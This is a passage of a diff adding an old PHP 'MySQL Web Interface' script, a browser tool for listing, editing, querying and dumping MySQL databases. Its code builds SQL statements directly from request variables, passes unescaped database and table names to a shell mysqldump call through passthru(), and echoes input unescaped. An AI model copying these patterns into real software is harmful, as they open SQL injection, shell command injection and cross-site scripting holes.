value='Query'>\n"; +echo "</form>\n"; +echo "<hr>\n"; + +$pTable = mysql_list_tables( $dbname ); + +if( $pTable == 0 ) { + $msg = mysql_error(); + echo "<h3>Error : $msg</h3><p>\n"; + return; +} +$num = mysql_num_rows( $pTable ); + +echo "<table cellspacing=1 cellpadding=5>\n"; + +for( $i = 0; $i < $num; $i++ ) { + $tablename = mysql_tablename( $pTable, $i ); + + echo "<tr>\n"; + echo "<td>\n"; + echo "$tablename\n"; + echo "</td>\n"; + echo "<td>\n"; + echo "<a href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n"; + echo "</td>\n"; + echo "<td>\n"; + echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename'>Data</a>\n"; + echo "</td>\n"; + echo "<td>\n"; + echo "<a href='$PHP_SELF?action=dropTable&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Drop Database \'$dbname\'?')\">Drop</a>\n"; + echo "</td>\n"; + echo "<td>\n"; + echo "<a href='$PHP_SELF?action=dumpTable&dbname=$dbname&tablename=$tablename'>Dump</a>\n"; + echo "</td>\n"; + echo "</tr>\n"; +} + +echo "</table>"; +} + +function createTable() { +global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg; + +$queryStr = "CREATE TABLE $tablename ( no INT )"; +mysql_select_db( $dbname, $mysqlHandle ); +mysql_query( $queryStr, $mysqlHandle ); +$errMsg = mysql_error(); + +listTables(); +} + +function dropTable() { +global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg; + +$queryStr = "DROP TABLE $tablename"; +mysql_select_db( $dbname, $mysqlHandle ); +mysql_query( $queryStr, $mysqlHandle ); +$errMsg = mysql_error(); + +listTables(); +} + +function viewSchema() { +global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg; + +echo "<h1>Table Schema</h1>\n"; +echo "<p class=location>$dbname &gt; $tablename</p>\n"; + +echoQueryResult(); + +echo "<a href='$PHP_SELF?action=addField&dbname=$dbname&tablename=$tablename'>Add Field</a> | \n"; +echo "<a 
href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename'>View Data</a>\n"; +echo "<hr>\n"; + +$pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" ); +$num = mysql_num_rows( $pResult ); + +echo "<table cellspacing=1 cellpadding=5>\n"; +echo "<tr>\n"; +echo "<th>Field</th>\n"; +echo "<th>Type</th>\n"; +echo "<th>Null</th>\n"; +echo "<th>Key</th>\n"; +echo "<th>Default</th>\n"; +echo "<th>Extra</th>\n"; +echo "<th colspan=2>Action</th>\n"; +echo "</tr>\n"; + +for( $i = 0; $i < $num; $i++ ) { + $field = mysql_fetch_array( $pResult ); + echo "<tr>\n"; + echo "<td>".$field["Field"]."</td>\n"; + echo "<td>".$field["Type"]."</td>\n"; + echo "<td>".$field["Null"]."</td>\n"; + echo "<td>".$field["Key"]."</td>\n"; + echo "<td>".$field["Default"]."</td>\n"; + echo "<td>".$field["Extra"]."</td>\n"; + $fieldname = $field["Field"]; + echo "<td><a href='$PHP_SELF?action=editField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname'>Edit</a></td>\n"; + echo "<td><a href='$PHP_SELF?action=dropField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname' onClick=\"return confirm('Drop Field \'$fieldname\'?')\">Drop</a></td>\n"; + echo "</tr>\n"; +} +echo "</table>\n"; +} + +function manageField( $cmd ) { +global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF; + +if( $cmd == "add" ) + echo "<h1>Add Field</h1>\n"; +else if( $cmd == "edit" ) { + echo "<h1>Edit Field</h1>\n"; + $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" ); + $num = mysql_num_rows( $pResult ); + for( $i = 0; $i < $num; $i++ ) { + $field = mysql_fetch_array( $pResult ); + if( $field["Field"] == $fieldname ) { + $fieldtype = $field["Type"]; + $fieldkey = $field["Key"]; + $fieldextra = $field["Extra"]; + $fieldnull = $field["Null"]; + $fielddefault = $field["Default"]; + break; + } + } + $type = strtok( $fieldtype, " (,)\n" ); + if( strpos( $fieldtype, "(" ) ) { + if( $type == "enum" | $type == "set" ) { + $valuelist = strtok( " ()\n" ); + } else { + $M = 
strtok( " (,)\n" ); + if( strpos( $fieldtype, "," ) ) + $D = strtok( " (,)\n" ); + } + } +} + +echo "<p class=location>$dbname &gt; $tablename</p>\n"; +echo "<form action=$PHP_SELF>\n"; + +if( $cmd == "add" ) + echo "<input type=hidden name=action value=addField_submit>\n"; +else if( $cmd == "edit" ) { + echo "<input type=hidden name=action value=editField_submit>\n"; + echo "<input type=hidden name=old_name value=$fieldname>\n"; +} +echo "<input type=hidden name=dbname value=$dbname>\n"; +echo "<input type=hidden name=tablename value=$tablename>\n"; + +echo "<h3>Name</h3>\n"; +echo "<input type=text name=name value=$fieldname><p>\n"; +?> + +<h3>Type</h3> + +<font size=2> +* `M' indicates the maximum display size.<br> +* `D' applies to floating-point types and indicates the number of digits following the decimal point.<br> +</font> + +<table> +<tr> +<th>Type</th><th>&nbspM&nbsp</th><th>&nbspD&nbsp</th><th>unsigned</th><th>zerofill</th><th>binary</th> +</tr> +<tr> +<td><input type=radio name=type value="TINYINT" <? if( $type == "tinyint" ) echo "checked";?>>TINYINT (-128 ~ 127)</td> +<td align=center>O</td> +<td>&nbsp</td> +<td align=center>O</td> +<td align=center>O</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="SMALLINT" <? if( $type == "smallint" ) echo "checked";?>>SMALLINT (-32768 ~ 32767)</td> +<td align=center>O</td> +<td>&nbsp</td> +<td align=center>O</td> +<td align=center>O</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="MEDIUMINT" <? if( $type == "mediumint" ) echo "checked";?>>MEDIUMINT (-8388608 ~ 8388607)</td> +<td align=center>O</td> +<td>&nbsp</td> +<td align=center>O</td> +<td align=center>O</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="INT" <? 
if( $type == "int" ) echo "checked";?>>INT (-2147483648 ~ 2147483647)</td> +<td align=center>O</td> +<td>&nbsp</td> +<td align=center>O</td> +<td align=center>O</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="BIGINT" <? if( $type == "bigint" ) echo "checked";?>>BIGINT (-9223372036854775808 ~ 9223372036854775807)</td> +<td align=center>O</td> +<td>&nbsp</td> +<td align=center>O</td> +<td align=center>O</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="FLOAT" <? if( $type == "float" ) echo "checked";?>>FLOAT</td> +<td align=center>O</td> +<td align=center>O</td> +<td>&nbsp</td> +<td align=center>O</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="DOUBLE" <? if( $type == "double" ) echo "checked";?>>DOUBLE</td> +<td align=center>O</td> +<td align=center>O</td> +<td>&nbsp</td> +<td align=center>O</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="DECIMAL" <? if( $type == "decimal" ) echo "checked";?>>DECIMAL(NUMERIC)</td> +<td align=center>O</td> +<td align=center>O</td> +<td>&nbsp</td> +<td align=center>O</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="DATE" <? if( $type == "date" ) echo "checked";?>>DATE (1000-01-01 ~ 9999-12-31, YYYY-MM-DD)</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="DATETIME" <? if( $type == "datetime" ) echo "checked";?>>DATETIME (1000-01-01 00:00:00 ~ 9999-12-31 23:59:59, YYYY-MM-DD HH:MM:SS)</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="TIMESTAMP" <? if( $type == "timestamp" ) echo "checked";?>>TIMESTAMP (1970-01-01 00:00:00 ~ 2106..., YYYYMMDD[HH[MM[SS]]])</td> +<td align=center>O</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="TIME" <? 
if( $type == "time" ) echo "checked";?>>TIME (-838:59:59 ~ 838:59:59, HH:MM:SS)</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="YEAR" <? if( $type == "year" ) echo "checked";?>>YEAR (1901 ~ 2155, 0000, YYYY)</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="CHAR" <? if( $type == "char" ) echo "checked";?>>CHAR</td> +<td align=center>O</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td align=center>O</td> +</tr> +<tr> +<td><input type=radio name=type value="VARCHAR" <? if( $type == "varchar" ) echo "checked";?>>VARCHAR</td> +<td align=center>O</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td align=center>O</td> +</tr> +<tr> +<td><input type=radio name=type value="TINYTEXT" <? if( $type == "tinytext" ) echo "checked";?>>TINYTEXT (0 ~ 255)</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="TEXT" <? if( $type == "text" ) echo "checked";?>>TEXT (0 ~ 65535)</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="MEDIUMTEXT" <? if( $type == "mediumtext" ) echo "checked";?>>MEDIUMTEXT (0 ~ 16777215)</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="LONGTEXT" <? if( $type == "longtext" ) echo "checked";?>>LONGTEXT (0 ~ 4294967295)</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="TINYBLOB" <? if( $type == "tinyblob" ) echo "checked";?>>TINYBLOB (0 ~ 255)</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="BLOB" <? 
if( $type == "blob" ) echo "checked";?>>BLOB (0 ~ 65535)</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="MEDIUMBLOB" <? if( $type == "mediumblob" ) echo "checked";?>>MEDIUMBLOB (0 ~ 16777215)</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="LONGBLOB" <? if( $type == "longblob" ) echo "checked";?>>LONGBLOB (0 ~ 4294967295)</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="ENUM" <? if( $type == "enum" ) echo "checked";?>>ENUM</td> +<td colspan=5><center>value list</center></td> +</tr> +<tr> +<td><input type=radio name=type value="SET" <? if( $type == "set" ) echo "checked";?>>SET</td> +<td colspan=5><center>value list</center></td> +</tr> + +</table> +<table> +<tr><th>M</th><th>D</th><th>unsigned</th><th>zerofill</th><th>binary</th><th>value list (ex: 'apple', 'orange', 'banana') </th></tr> +<tr> +<td align=center><input type=text size=4 name=M <? if( $M != "" ) echo "value=$M";?>></td> +<td align=center><input type=text size=4 name=D <? if( $D != "" ) echo "value=$D";?>></td> +<td align=center><input type=checkbox name=unsigned value="UNSIGNED" <? if( strpos( $fieldtype, "unsigned" ) ) echo "checked";?>></td> +<td align=center><input type=checkbox name=zerofill value="ZEROFILL" <? if( strpos( $fieldtype, "zerofill" ) ) echo "checked";?>></td> +<td align=center><input type=checkbox name=binary value="BINARY" <? if( strpos( $fieldtype, "binary" ) ) echo "checked";?>></td> +<td align=center><input type=text size=60 name=valuelist <? if( $valuelist != "" ) echo "value=\"$valuelist\"";?>></td> +</tr> +</table> + + +<h3>Flags</h3> +<table> +<tr><th>not null</th><th>default value</th><th>auto increment</th><th>primary key</th></tr> +<tr> +<td align=center><input type=checkbox name=not_null value="NOT NULL" <? 
if( $fieldnull != "YES" ) echo "checked";?>></td> +<td align=center><input type=text name=default_value <? if( $fielddefault != "" ) echo "value=$fielddefault";?>></td> +<td align=center><input type=checkbox name=auto_increment value="AUTO_INCREMENT" <? if( $fieldextra == "auto_increment" ) echo "checked";?>></td> +<td align=center><input type=checkbox name=primary_key value="PRIMARY KEY" <? if( $fieldkey == "PRI" ) echo "checked";?>></td> +</tr> +</table> + +<p> + +<? +if( $cmd == "add" ) + echo "<input type=submit value='Add Field'>\n"; +else if( $cmd == "edit" ) + echo "<input type=submit value='Edit Field'>\n"; +echo "<input type=button value=Cancel onClick='history.back()'>\n"; +echo "</form>\n"; +} + +function manageField_submit( $cmd ) { +global $mysqlHandle, $dbname, $tablename, $old_name, $name, $type, $PHP_SELF, $queryStr, $errMsg, + $M, $D, $unsigned, $zerofill, $binary, $not_null, $default_value, $auto_increment, $primary_key, $valuelist; + +if( $cmd == "add" ) + $queryStr = "ALTER TABLE $tablename ADD $name "; +else if( $cmd == "edit" ) + $queryStr = "ALTER TABLE $tablename CHANGE $old_name $name "; + +if( $M != "" ) + if( $D != "" ) + $queryStr .= "$type($M,$D) "; + else + $queryStr .= "$type($M) "; +else if( $valuelist != "" ) { + $valuelist = stripslashes( $valuelist ); + $queryStr .= "$type($valuelist) "; +} else + $queryStr .= "$type "; + +$queryStr .= "$unsigned $zerofill $binary "; + +if( $default_value != "" ) + $queryStr .= "DEFAULT '$default_value' "; + +$queryStr .= "$not_null $auto_increment"; + +mysql_select_db( $dbname, $mysqlHandle ); +mysql_query( $queryStr, $mysqlHandle ); +$errMsg = mysql_error(); + +// key change +$keyChange = false; +$result = mysql_query( "SHOW KEYS FROM $tablename" ); +$primary = ""; +while( $row = mysql_fetch_array($result) ) + if( $row["Key_name"] == "PRIMARY" ) { + if( $row[Column_name] == $name ) + $keyChange = true; + else + $primary .= ", $row[Column_name]"; + } +if( $primary_key == "PRIMARY KEY" ) { + 
$primary .= ", $name"; + $keyChange = !$keyChange; +} +$primary = substr( $primary, 2 ); +if( $keyChange == true ) { + $q = "ALTER TABLE $tablename DROP PRIMARY KEY"; + mysql_query( $q ); + $queryStr .= "<br>\n" . $q; + $errMsg .= "<br>\n" . mysql_error(); + $q = "ALTER TABLE $tablename ADD PRIMARY KEY( $primary )"; + mysql_query( $q ); + $queryStr .= "<br>\n" . $q; + $errMsg .= "<br>\n" . mysql_error(); +} + +viewSchema(); +} + +function dropField() { +global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg; + +$queryStr = "ALTER TABLE $tablename DROP COLUMN $fieldname"; +mysql_select_db( $dbname, $mysqlHandle ); +mysql_query( $queryStr , $mysqlHandle ); +$errMsg = mysql_error(); + +viewSchema(); +} + +function viewData( $queryStr ) { +global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby; + +echo "<h1>Data in Table</h1>\n"; +if( $tablename != "" ) + echo "<p class=location>$dbname &gt; $tablename</p>\n"; +else + echo "<p class=location>$dbname</p>\n"; + +$queryStr = stripslashes( $queryStr ); +if( $queryStr == "" ) { + $queryStr = "SELECT * FROM $tablename"; + if( $orderby != "" ) + $queryStr .= " ORDER BY $orderby"; + echo "<a href='$PHP_SELF?action=addData&dbname=$dbname&tablename=$tablename'>Add Data</a> | \n"; + echo "<a href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n"; +} + +$pResult = mysql_db_query( $dbname, $queryStr ); +$errMsg = mysql_error(); + +$GLOBALS[queryStr] = $queryStr; + +if( $pResult == false ) { + echoQueryResult(); + return; +} +if( $pResult == 1 ) { + $errMsg = "Success"; + echoQueryResult(); + return; +} + +echo "<hr>\n"; + +$row = mysql_num_rows( $pResult ); +$col = mysql_num_fields( $pResult ); + +if( $row == 0 ) { + echo "No Data Exist!"; + return; +} + +if( $rowperpage == "" ) $rowperpage = 20; +if( $page == "" ) $page = 0; +else $page--; +mysql_data_seek( $pResult, $page * $rowperpage ); + +echo "<table cellspacing=1 cellpadding=2>\n"; 
+echo "<tr>\n"; +for( $i = 0; $i < $col; $i++ ) { + $field = mysql_fetch_field( $pResult, $i ); + echo "<th>"; + echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&orderby=".$field->name."'>".$field->name."</a>\n"; + echo "</th>\n"; +} +echo "<th colspan=2>Action</th>\n"; +echo "</tr>\n"; + +for( $i = 0; $i < $rowperpage; $i++ ) { + $rowArray = mysql_fetch_row( $pResult ); + if( $rowArray == false ) break; + echo "<tr>\n"; + $key = ""; + for( $j = 0; $j < $col; $j++ ) { + $data = $rowArray[$j]; + + $field = mysql_fetch_field( $pResult, $j ); + if( $field->primary_key == 1 ) + $key .= "&" . $field->name . "=" . $data; + + if( strlen( $data ) > 20 ) + $data = substr( $data, 0, 20 ) . "..."; + $data = htmlspecialchars( $data ); + echo "<td>\n"; + echo "$data\n"; + echo "</td>\n"; + } + + if( $key == "" ) + echo "<td colspan=2>no Key</td>\n"; + else { + echo "<td><a href='$PHP_SELF?action=editData&dbname=$dbname&tablename=$tablename$key'>Edit</a></td>\n"; + echo "<td><a href='$PHP_SELF?action=deleteData&dbname=$dbname&tablename=$tablename$key' onClick=\"return confirm('Delete Row?')\">Delete</a></td>\n"; + } + echo "</tr>\n"; +} +echo "</table>\n"; + +echo "<font size=2>\n"; +echo "<form action='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename' method=post>\n"; +echo "<font color=green>\n"; +echo ($page+1)."/".(int)($row/$rowperpage+1)." 
page"; +echo "</font>\n"; +echo " | "; +if( $page > 0 ) { + echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&page=".($page); + if( $orderby != "" ) + echo "&orderby=$orderby"; + echo "'>Prev</a>\n"; +} else + echo "Prev"; +echo " | "; +if( $page < ($row/$rowperpage)-1 ) { + echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&page=".($page+2); + if( $orderby != "" ) + echo "&orderby=$orderby"; + echo "'>Next</a>\n"; +} else + echo "Next"; +echo " | "; +if( $row > $rowperpage ) { + echo "<input type=text size=4 name=page>\n"; + echo "<input type=submit value='Go'>\n"; +} +echo "</form>\n"; +echo "</font>\n"; +} + +function manageData( $cmd ) { +global $mysqlHandle, $dbname, $tablename, $PHP_SELF; + +if( $cmd == "add" ) + echo "<h1>Add Data</h1>\n"; +else if( $cmd == "edit" ) { + echo "<h1>Edit Data</h1>\n"; + $pResult = mysql_list_fields( $dbname, $tablename ); + $num = mysql_num_fields( $pResult ); + + $key = ""; + for( $i = 0; $i < $num; $i++ ) { + $field = mysql_fetch_field( $pResult, $i ); + if( $field->primary_key == 1 ) + if( $field->numeric == 1 ) + $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND "; + else + $key .= $field->name . "='" . $GLOBALS[$field->name] . 
"' AND "; + } + $key = substr( $key, 0, strlen($key)-4 ); + + mysql_select_db( $dbname, $mysqlHandle ); + $pResult = mysql_query( $queryStr = "SELECT * FROM $tablename WHERE $key", $mysqlHandle ); + $data = mysql_fetch_array( $pResult ); +} + +echo "<p class=location>$dbname &gt; $tablename</p>\n"; + +echo "<form action='$PHP_SELF' method=post>\n"; +if( $cmd == "add" ) + echo "<input type=hidden name=action value=addData_submit>\n"; +else if( $cmd == "edit" ) + echo "<input type=hidden name=action value=editData_submit>\n"; +echo "<input type=hidden name=dbname value=$dbname>\n"; +echo "<input type=hidden name=tablename value=$tablename>\n"; +echo "<table cellspacing=1 cellpadding=2>\n"; +echo "<tr>\n"; +echo "<th>Name</th>\n"; +echo "<th>Type</th>\n"; +echo "<th>Function</th>\n"; +echo "<th>Data</th>\n"; +echo "</tr>\n"; + +$pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" ); +$num = mysql_num_rows( $pResult ); + +$pResultLen = mysql_list_fields( $dbname, $tablename ); + +for( $i = 0; $i < $num; $i++ ) { + $field = mysql_fetch_array( $pResult ); + $fieldname = $field["Field"]; + $fieldtype = $field["Type"]; + $len = mysql_field_len( $pResultLen, $i ); + + echo "<tr>"; + echo "<td>$fieldname</td>"; + echo "<td>".$field["Type"]."</td>"; + echo "<td>\n"; + echo "<select name=${fieldname}_function>\n"; + echo "<option>\n"; + echo "<option>ASCII\n"; + echo "<option>CHAR\n"; + echo "<option>SOUNDEX\n"; + echo "<option>CURDATE\n"; + echo "<option>CURTIME\n"; + echo "<option>FROM_DAYS\n"; + echo "<option>FROM_UNIXTIME\n"; + echo "<option>NOW\n"; + echo "<option>PASSWORD\n"; + echo "<option>PERIOD_ADD\n"; + echo "<option>PERIOD_DIFF\n"; + echo "<option>TO_DAYS\n"; + echo "<option>USER\n"; + echo "<option>WEEKDAY\n"; + echo "<option>RAND\n"; + echo "</select>\n"; + echo "</td>\n"; + $value = htmlspecialchars($data[$i]); + if( $cmd == "add" ) { + $type = strtok( $fieldtype, " (,)\n" ); + if( $type == "enum" || $type == "set" ) { + echo "<td>\n"; + if( $type 
== "enum" ) + echo "<select name=$fieldname>\n"; + else if( $type == "set" ) + echo "<select name=$fieldname size=4 multiple>\n"; + echo strtok( "'" ); + while( $str = strtok( "'" ) ) { + echo "<option>$str\n"; + strtok( "'" ); + } + echo "</select>\n"; + echo "</td>\n"; + } else { + if( $len < 40 ) + echo "<td><input type=text size=40 maxlength=$len name=$fieldname></td>\n"; + else + echo "<td><textarea cols=40 rows=3 maxlength=$len name=$fieldname></textarea>\n"; + } + } else if( $cmd == "edit" ) { + $type = strtok( $fieldtype, " (,)\n" ); + if( $type == "enum" || $type == "set" ) { + echo "<td>\n"; + if( $type == "enum" ) + echo "<select name=$fieldname>\n"; + else if( $type == "set" ) + echo "<select name=$fieldname size=4 multiple>\n"; + echo strtok( "'" ); + while( $str = strtok( "'" ) ) { + if( $value == $str ) + echo "<option selected>$str\n"; + else + echo "<option>$str\n"; + strtok( "'" ); + } + echo "</select>\n"; + echo "</td>\n"; + } else { + if( $len < 40 ) + echo "<td><input type=text size=40 maxlength=$len name=$fieldname value=\"$value\"></td>\n"; + else + echo "<td><textarea cols=40 rows=3 maxlength=$len name=$fieldname>$value</textarea>\n"; + } + } + echo "</tr>"; +} +echo "</table><p>\n"; +if( $cmd == "add" ) + echo "<input type=submit value='Add Data'>\n"; +else if( $cmd == "edit" ) + echo "<input type=submit value='Edit Data'>\n"; +echo "<input type=button value='Cancel' onClick='history.back()'>\n"; +echo "</form>\n"; +} + +function manageData_submit( $cmd ) { +global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg; + +$pResult = mysql_list_fields( $dbname, $tablename ); +$num = mysql_num_fields( $pResult ); + +mysql_select_db( $dbname, $mysqlHandle ); +if( $cmd == "add" ) + $queryStr = "INSERT INTO $tablename VALUES ("; +else if( $cmd == "edit" ) + $queryStr = "REPLACE INTO $tablename VALUES ("; +for( $i = 0; $i < $num-1; $i++ ) { + $field = mysql_fetch_field( $pResult ); + $func = 
$GLOBALS[$field->name."_function"]; + if( $func != "" ) + $queryStr .= " $func("; + if( $field->numeric == 1 ) { + $queryStr .= $GLOBALS[$field->name]; + if( $func != "" ) + $queryStr .= "),"; + else + $queryStr .= ","; + } else { + $queryStr .= "'" . $GLOBALS[$field->name]; + if( $func != "" ) + $queryStr .= "'),"; + else + $queryStr .= "',"; + } +} +$field = mysql_fetch_field( $pResult ); +if( $field->numeric == 1 ) + $queryStr .= $GLOBALS[$field->name] . ")"; +else + $queryStr .= "'" . $GLOBALS[$field->name] . "')"; + +mysql_query( $queryStr , $mysqlHandle ); +$errMsg = mysql_error(); + +viewData( "" ); +} + +function deleteData() { +global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg; + +$pResult = mysql_list_fields( $dbname, $tablename ); +$num = mysql_num_fields( $pResult ); + +$key = ""; +for( $i = 0; $i < $num; $i++ ) { + $field = mysql_fetch_field( $pResult, $i ); + if( $field->primary_key == 1 ) + if( $field->numeric == 1 ) + $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND "; + else + $key .= $field->name . "='" . $GLOBALS[$field->name] . 
"' AND "; +} +$key = substr( $key, 0, strlen($key)-4 ); + +mysql_select_db( $dbname, $mysqlHandle ); +$queryStr = "DELETE FROM $tablename WHERE $key"; +mysql_query( $queryStr, $mysqlHandle ); +$errMsg = mysql_error(); + +viewData( "" ); +} + +function dump() { +global $PHP_SELF, $USERNAME, $PASSWORD, $action, $dbname, $tablename; + +if( $action == "dumpTable" ) + $filename = $tablename; +else + $filename = $dbname; + +header("Content-disposition: filename=$filename.sql"); +header("Content-type: application/octetstream"); +header("Pragma: no-cache"); +header("Expires: 0"); + +$pResult = mysql_query( "show variables" ); +while( 1 ) { + $rowArray = mysql_fetch_row( $pResult ); + if( $rowArray == false ) break; + if( $rowArray[0] == "basedir" ) + $bindir = $rowArray[1]."bin/"; +} + +passthru( $bindir."mysqldump --user=$USERNAME --password=$PASSWORD $dbname $tablename" ); +} + +function utils() { +global $PHP_SELF, $command; +echo "<h1>Utilities</h1>\n"; +if( $command == "" || substr( $command, 0, 5 ) == "flush" ) { + echo "<hr>\n"; + echo "Show\n"; + echo "<ul>\n"; + echo "<li><a href='$PHP_SELF?action=utils&command=show_status'>Status</a>\n"; + echo "<li><a href='$PHP_SELF?action=utils&command=show_variables'>Variables</a>\n"; + echo "<li><a href='$PHP_SELF?action=utils&command=show_processlist'>Processlist</a>\n"; + echo "</ul>\n"; + echo "Flush\n"; + echo "<ul>\n"; + echo "<li><a href='$PHP_SELF?action=utils&command=flush_hosts'>Hosts</a>\n"; + if( $command == "flush_hosts" ) { + if( mysql_query( "Flush hosts" ) != false ) + echo "<font size=2 color=red>- Success</font>"; + else + echo "<font size=2 color=red>- Fail</font>"; + } + echo "<li><a href='$PHP_SELF?action=utils&command=flush_logs'>Logs</a>\n"; + if( $command == "flush_logs" ) { + if( mysql_query( "Flush logs" ) != false ) + echo "<font size=2 color=red>- Success</font>"; + else + echo "<font size=2 color=red>- Fail</font>"; + } + echo "<li><a 
href='$PHP_SELF?action=utils&command=flush_privileges'>Privileges</a>\n"; + if( $command == "flush_privileges" ) { + if( mysql_query( "Flush privileges" ) != false ) + echo "<font size=2 color=red>- Success</font>"; + else + echo "<font size=2 color=red>- Fail</font>"; + } + echo "<li><a href='$PHP_SELF?action=utils&command=flush_tables'>Tables</a>\n"; + if( $command == "flush_tables" ) { + if( mysql_query( "Flush tables" ) != false ) + echo "<font size=2 color=red>- Success</font>"; + else + echo "<font size=2 color=red>- Fail</font>"; + } + echo "<li><a href='$PHP_SELF?action=utils&command=flush_status'>Status</a>\n"; + if( $command == "flush_status" ) { + if( mysql_query( "Flush status" ) != false ) + echo "<font size=2 color=red>- Success</font>"; + else + echo "<font size=2 color=red>- Fail</font>"; + } + echo "</ul>\n"; +} else { + $queryStr = ereg_replace( "_", " ", $command ); + $pResult = mysql_query( $queryStr ); + if( $pResult == false ) { + echo "Fail"; + return; + } + $col = mysql_num_fields( $pResult ); + + echo "<p class=location>$queryStr</p>\n"; + echo "<hr>\n"; + + echo "<table cellspacing=1 cellpadding=2 border=0>\n"; + echo "<tr>\n"; + for( $i = 0; $i < $col; $i++ ) { + $field = mysql_fetch_field( $pResult, $i ); + echo "<th>".$field->name."</th>\n"; + } + echo "</tr>\n"; + + while( 1 ) { + $rowArray = mysql_fetch_row( $pResult ); + if( $rowArray == false ) break; + echo "<tr>\n"; + for( $j = 0; $j < $col; $j++ ) + echo "<td>".htmlspecialchars( $rowArray[$j] )."</td>\n"; + echo "</tr>\n"; + } + echo "</table>\n"; +} +} + +function header_html() { +global $PHP_SELF; + +?> +<html> +<head> +<title>MySQL Web Interface</title> +<style type="text/css"> +<!-- +p.location { +color: #FF6000; +font-size: small; +} +h1 { +color: #0090FF; +} +th { +background-color: #34A725; +color: #FFFFFF; +font-size: x-small; +} +td { +background-color: #5DB1FF; +font-size: x-small; +} +form { +margin-top: 0; +margin-bottom: 0; +} +a { +text-decoration:none; +color: 
#848200;
+font-size:x-small;
+}
+a:link {
+}
+a:hover {
+background-color:#EEEFD5;
+color:#FF0000;
+text-decoration:none
+}
+//-->
+</style>
+</head>
+<body>
+<?
+}
+
+function footer_html() {
+global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $USERNAME;
+
+echo "<hr>\n";
+echo "<font size=2>\n";
+echo "<font color=blue>[$USERNAME]</font> - \n";
+
+echo "<a href='$PHP_SELF?action=listDBs'>Database List</a> | \n";
+if( $tablename != "" )
+ echo "<a href='$PHP_SELF?action=listTables&dbname=$dbname&tablename=$tablename'>Table List</a> | ";
+echo "<a href='$PHP_SELF?action=utils'>Utils</a> |\n";
+echo "<a href='$PHP_SELF?action=logout'>Logout</a>\n";
+echo "</font>\n";
+echo "</body>\n";
+echo "</html>\n";
+}
+
+//------------------------------------------------------ MAIN
+
+if( $action == "logon" || $action == "" || $action == "logout" )
+logon();
